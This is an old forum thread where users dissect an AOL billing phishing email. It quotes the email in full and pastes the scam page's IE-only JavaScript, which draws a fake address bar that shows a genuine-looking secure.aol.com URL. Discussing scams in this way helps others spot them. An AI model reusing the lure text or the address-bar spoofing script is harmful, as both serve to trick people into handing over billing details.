[Tenchiro]

I got this in my spam filter, and I am not even an AOL subscriber... Definately a scam.

Dear AOL Member,

AOL Data Security is the new program launched by America Online, Inc.

The data processing filter (type E-secure M5771) is encripted not to allow any third party access to AOL accounts. In accordance to load your information to the new system we kindly ask you to click on the link below and renew your account billing information. Having your information compared to the one we already have will avoid any errors in the system and your current AOL account.

Please use the link below to update your billing information: https://secure.aol.com/billingdept/alert/customer_confirmation.psp?siteId=billingfeatures&siteState=OrigCard

We are deeply sorry for the inconvenience that this e-mail might caused. Our duty is to secure the services we provide our clients with. We are happy to serve and protect our members!

AOL Billing Dept team.
America Online, Inc.

 

[Tenchiro]

Damn, these guys have fake login pages for Citibank also

 

[Slugman]

Alert AOL and Citibank...

 

[jacksonpt]

We are deeply sorry for the inconvenience that this e-mail might caused

At least use decent grammar.

 

[Tenchiro]

After looking at the code on the page I have deleted the URL's there is a suspicious looking bit of Javascript in there, that I don't want anyone to get screwed by.

 

[Tenchiro]

Alert AOL and Citibank...

I found their ISP (in China) and notified them.

 

[Tenchiro]

Not sure what it pops up but it looks like trouble and it didn't work on Firefox.

<script type="text/javascript">
var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
];
vuln_x= window.screenLeft+68;
vuln_y= window.screenTop-20;
vuln_w= root.offsetWidth-420;
vuln_h= 17;
vuln_show();
}

var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;
vuln_show();
}

function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html= '\x3Cdiv style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: 8pt;">https://secure.aol.com/billingdept/alert/customer_confirmation.psp?siteId=billingfeatures&siteState=OrigCard\x3C/div>'

if (window.createPopup) {
vuln_calc();
vuln_pop();
window.setInterval(vuln_calc, 25);
} else {
}
</script>

 

[binary visions]

Not sure what it pops up but it looks like trouble and it didn't work on Firefox.

Hm.. looks relatively harmless. Doesn't seem to do anything exciting except create a new popup window under that address with a few specific attributes.

That's actually a nicely set up scam - good spelling and grammar except for the one error, what appears at first to be a legitimate address...

 

[johnbryanpeters]

Hm.. looks relatively harmless. Doesn't seem to do anything exciting except create a new popup window under that address with a few specific attributes.

That's actually a nicely set up scam - good spelling and grammar except for the one error, what appears at first to be a legitimate address...

At least two:

"In accordance to load your information..."